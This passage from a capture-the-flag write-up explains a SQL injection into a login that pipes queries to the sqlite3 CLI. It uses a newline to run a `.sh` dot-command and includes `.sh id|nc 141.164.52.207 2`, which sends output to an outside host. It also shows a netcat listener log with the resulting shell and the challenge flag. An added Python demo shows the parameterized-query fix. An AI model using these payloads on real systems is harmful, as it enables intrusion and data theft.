As shown above, the sqlite3 shell will execute a system command through its `.sh` command (`.sh` is accepted as an abbreviation of `.shell`).
```python
import subprocess

def sqlite3_query(sql):
    # The query text is piped verbatim to the sqlite3 CLI over stdin, so any
    # newline inside it starts a fresh input line for the shell.
    p = subprocess.Popen(['sqlite3', 'database.db'],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    o, e = p.communicate(sql.encode())
    if e:
        raise Exception(e)
    result = []
    for row in o.decode().split('\n'):
        if row == '':
            break
        result.append(tuple(row.split('|')))
    return result
```
Looking at the source, sqlite3_query() hands the whole query to the sqlite3 CLI over stdin via subprocess.Popen().communicate(), so a `\n` character in the query lets you break onto a new line of the shell's input.
```python
import hashlib

password_hash = hashlib.sha256(password.encode()).hexdigest()
result = None
try:
    result = sqlite3_query(
        'SELECT * FROM users WHERE username="{}" AND password="{}";'
        .format(sqlite3_escape(username), password_hash)
    )
except:
    pass
```
Looking at the login logic, the username and password are read from the request, their lengths are checked, and they are formatted into the query string. Only the username goes through sqlite3_escape(), but that is no obstacle: SQLite does not treat a backslash as an escape character inside a string, so `\"` is just a backslash followed by a quote that still terminates the string.
```sql
SELECT * FROM users where username = "\" or 1=1 -- " and password = "pocas";
```
In other words, the escaping makes no difference: the injected quote still closes the string, as above, and everything after it is parsed as SQL.
```sql
SELECT * FROM users where username = "\";
.sh id|nc 141.164.52.207 2;
and password = "pocas";
```
So by breaking the line as above, the `.sh` command lands at the start of its own input line, where the sqlite3 shell treats it as a dot-command and runs the shell command.
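To make the two mechanics above concrete (the backslash "escape" that SQLite ignores, and the newline that turns part of the query into a dot-command on sqlite3's stdin), here is an added Python example written for this page; it is not the challenge's own code. It assumes `sqlite3_escape` backslash-escapes double quotes, as the queries above suggest, builds a constructed in-memory users table with Python's `sqlite3` module instead of the CLI, and approximates the shell's stdin handling with `sqlite3.complete_statement()` (the same `sqlite3_complete()` check the CLI uses to decide whether a statement has ended). The attacker address is the one used in the writeup; the hardened `login_safe` with bound parameters is the fix a practitioner would ship.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for the challenge's database.db.
USERS = [("admin", "secret"), ("guest", "guest")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [(u, hashlib.sha256(p.encode()).hexdigest()) for u, p in USERS],
    )
    return conn


def sqlite3_escape(s):
    # Assumed reconstruction of the challenge's escape routine: a backslash in
    # front of every double quote. SQLite has no backslash escapes, so this
    # never keeps the quote closed.
    return s.replace('"', '\\"')


def build_query(username, password):
    # Same string-built query as the writeup's login handler.
    password_hash = hashlib.sha256(password.encode()).hexdigest()
    return 'SELECT * FROM users WHERE username="{}" AND password="{}";'.format(
        sqlite3_escape(username), password_hash)


def build_query_quoted(username, password):
    # Still string building (bound parameters are the real fix), but with
    # SQLite's real literal syntax: single quotes, doubled inside the value.
    password_hash = hashlib.sha256(password.encode()).hexdigest()
    return "SELECT * FROM users WHERE username='{}' AND password='{}';".format(
        username.replace("'", "''"), password_hash)


def classify_cli_input(text):
    """Approximation of how the sqlite3 shell consumes stdin: a line that starts
    with '.' is a dot-command only while no SQL is buffered; otherwise lines are
    appended until sqlite3.complete_statement() says a statement has ended.
    Returns (dot_commands, sql_statements)."""
    dot_cmds, stmts, buf = [], [], ""
    for line in text.split("\n"):
        if not buf:
            if line.startswith("."):
                dot_cmds.append(line)
                continue
            if not line.strip():
                continue
        buf += line + "\n"
        if sqlite3.complete_statement(buf):
            stmts.append(buf.strip())
            buf = ""
    if buf.strip():
        stmts.append(buf.strip())  # unterminated tail; the shell keeps waiting
    return dot_cmds, stmts


def run_vulnerable_login(conn, username, password):
    """Execute the string-built query. Returns ('rows', rows) when SQLite ran it
    (its legacy double-quoted-string fallback turns the stray "\\" identifier
    into a literal), or ('error', msg) on builds without that fallback. Either
    way the injected quote terminated the string and the rest ran as SQL."""
    try:
        return "rows", conn.execute(build_query(username, password)).fetchall()
    except sqlite3.OperationalError as e:
        return "error", str(e)


def login_safe(conn, username, password):
    # Hardened form: bound parameters, no string building, no CLI subprocess.
    password_hash = hashlib.sha256(password.encode()).hexdigest()
    return [r[0] for r in conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password_hash))]


if __name__ == "__main__":
    conn = make_db()
    print(run_vulnerable_login(conn, '" or 1=1 -- ', "x"))
    # Username carrying the writeup's line break and dot-command.
    payload = '";\n.sh id|nc 141.164.52.207 2;\n'
    print(classify_cli_input(build_query(payload, "x")))
    print(classify_cli_input(build_query_quoted(payload, "x")))
    print(login_safe(conn, '" or 1=1 -- ', "x"), login_safe(conn, "admin", "secret"))
```

Note what `classify_cli_input` shows for the two query builders: with the backslash "escape", the first line already ends a complete statement, so the `.sh` line arrives while the shell's SQL buffer is empty and is treated as a dot-command; with proper single-quote literals the payload stays inside one unterminated string and the `.sh` line is just more SQL text. The parameterized query removes the string building altogether, which is the fix to prefer over any escaping.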
```
root@py:~# nc -lvnp 2
Listening on 0.0.0.0 2
Connection received on 165.227.180.221 38761
id
uid=1000(app) gid=1000(app)
cat templates/index.html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Welcome</title>
</head>
<body>
<h1>Welcome, {{name}}!</h1>
{% if name == 'admin' %}
<p>zer0pts{w0w_d1d_u_cr4ck_SHA256_0f_my_p4$$w0rd?}</p>
{% else %}
<p>No flag for you :(</p>
{% endif %}
</body>
</html>
```
Finally, I got a shell back using nc's -e option, read index.html, and saw the flag.
FLAG : zer0pts{w0w_d1d_u_cr4ck_SHA256_0f_my_p4$$w0rd?}